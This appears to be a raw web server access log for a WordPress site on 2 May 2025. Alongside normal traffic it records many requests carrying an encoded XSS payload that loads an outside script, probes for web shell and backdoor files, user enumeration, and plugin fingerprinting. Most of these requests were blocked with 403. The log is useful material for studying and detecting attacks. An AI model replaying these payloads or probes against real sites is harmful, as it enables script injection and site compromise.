94.102.49.19 - - [02/May/2025:15:51:05 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:15:51:06 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
54.244.63.85 - - [02/May/2025:16:22:15 +0330] "GET / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
94.102.49.19 - - [02/May/2025:16:28:17 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:15:55:15 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:16:18:00 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:16:18:01 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:16:50:55 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:16:50:55 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
164.90.166.111 - - [02/May/2025:16:51:05 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
94.102.49.19 - - [02/May/2025:16:53:20 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:16:53:27 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
95.24.129.159 - - [02/May/2025:17:07:15 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
41.59.65.202 - - [02/May/2025:17:07:10 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
95.24.129.159 - - [02/May/2025:17:07:20 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
95.24.129.159 - - [02/May/2025:17:07:24 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
94.102.49.19 - - [02/May/2025:17:15:44 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6632 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
46.63.254.6 - - [02/May/2025:17:43:22 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
117.62.235.53 - - [02/May/2025:17:42:55 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
94.102.49.19 - - [02/May/2025:17:46:35 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
165.232.185.113 - - [02/May/2025:18:09:29 +0330] "GET /wp-admin/css/ HTTP/1.1" 403 787 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
94.102.49.19 - - [02/May/2025:18:09:49 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
72.153.231.16 - - [02/May/2025:18:23:04 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
72.152.84.1 - - [02/May/2025:18:23:03 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
94.102.49.19 - - [02/May/2025:18:24:22 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:18:24:25 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
178.128.193.22 - - [02/May/2025:19:11:14 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
94.102.49.19 - - [02/May/2025:19:11:40 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6632 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
157.230.22.193 - - [02/May/2025:19:11:28 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:48.0) Gecko/20100101 Firefox/48.0"
107.175.149.167 - - [02/May/2025:19:27:22 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
158.220.97.202 - - [02/May/2025:19:28:05 +0330] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 200 285334 "-" "-"
107.175.149.167 - - [02/May/2025:19:27:13 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
107.175.149.167 - - [02/May/2025:19:27:29 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
94.102.49.19 - - [02/May/2025:19:27:52 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:19:35:54 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:19:35:55 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
92.205.215.142 - - [02/May/2025:19:54:45 +0330] "GET /wp-login.php HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
94.102.49.19 - - [02/May/2025:19:49:45 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:19:49:46 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
122.114.59.75 - - [02/May/2025:19:53:33 +0330] "GET /wp-login.php HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
94.102.49.19 - - [02/May/2025:20:04:46 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:20:15:31 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
107.151.222.116 - - [02/May/2025:20:22:51 +0330] "GET /wp-includes/ID3/index.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:15 +0330] "GET /wp-admin.php HTTP/1.1" 403 6635 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:17 +0330] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:19 +0330] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:26 +0330] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:30 +0330] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:32 +0330] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:33 +0330] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 403 6635 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.102.49.19 - - [02/May/2025:20:28:07 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:20:28:08 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
107.151.222.116 - - [02/May/2025:20:22:53 +0330] "GET /wp-content/plugins/index.php HTTP/1.1" 403 6635 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:22:54 +0330] "GET /wp-admin/network/index.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:22:55 +0330] "GET /wp-includes/IXR/index.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:03 +0330] "GET /wp-admin/images/index.php HTTP/1.1" 403 6635 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:05 +0330] "GET /wp-login.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:09 +0330] "GET /wp-content/plugins/admin.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:12 +0330] "GET /xmlrpc.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:22 +0330] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 403 6635 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
107.151.222.116 - - [02/May/2025:20:23:28 +0330] "GET /WSOEnigma.php HTTP/1.1" 403 6634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.102.49.19 - - [02/May/2025:20:25:32 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
43.166.142.76 - - [02/May/2025:20:29:41 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.61.161.124 - - [02/May/2025:21:01:22 +0330] "GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.1" 301 20 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
45.61.161.124 - - [02/May/2025:21:02:11 +0330] "GET /wp-content/themes/include.php HTTP/1.1" 301 20 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
94.102.49.19 - - [02/May/2025:20:53:47 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
66.249.64.128 - - [02/May/2025:21:29:49 +0330] "GET /robots.txt HTTP/1.1" 301 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.49.19 - - [02/May/2025:21:37:37 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:21:25:01 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:21:25:01 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
66.249.64.129 - - [02/May/2025:21:29:53 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
170.106.148.137 - - [02/May/2025:21:44:52 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
94.102.49.19 - - [02/May/2025:22:03:30 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:22:03:30 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:22:12:55 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
95.217.43.182 - - [02/May/2025:21:58:07 +0330] "GET /wp-content/plugins/forminator/readme.txt HTTP/1.1" 301 20 "-" "python-requests/2.32.3"
94.102.49.19 - - [02/May/2025:22:13:14 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:22:13:15 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:22:28:40 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
66.249.64.130 - - [02/May/2025:22:31:17 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.49.19 - - [02/May/2025:22:46:26 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:22:46:27 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
3.16.186.108 - - [02/May/2025:22:54:47 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 200 14097 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:22:55:18 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://mail.optimyar.com/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:22:56:00 +0330] "GET /wp-json/wp/v2/users HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:22:56:24 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:22:56:36 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://mail.optimyar.com/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
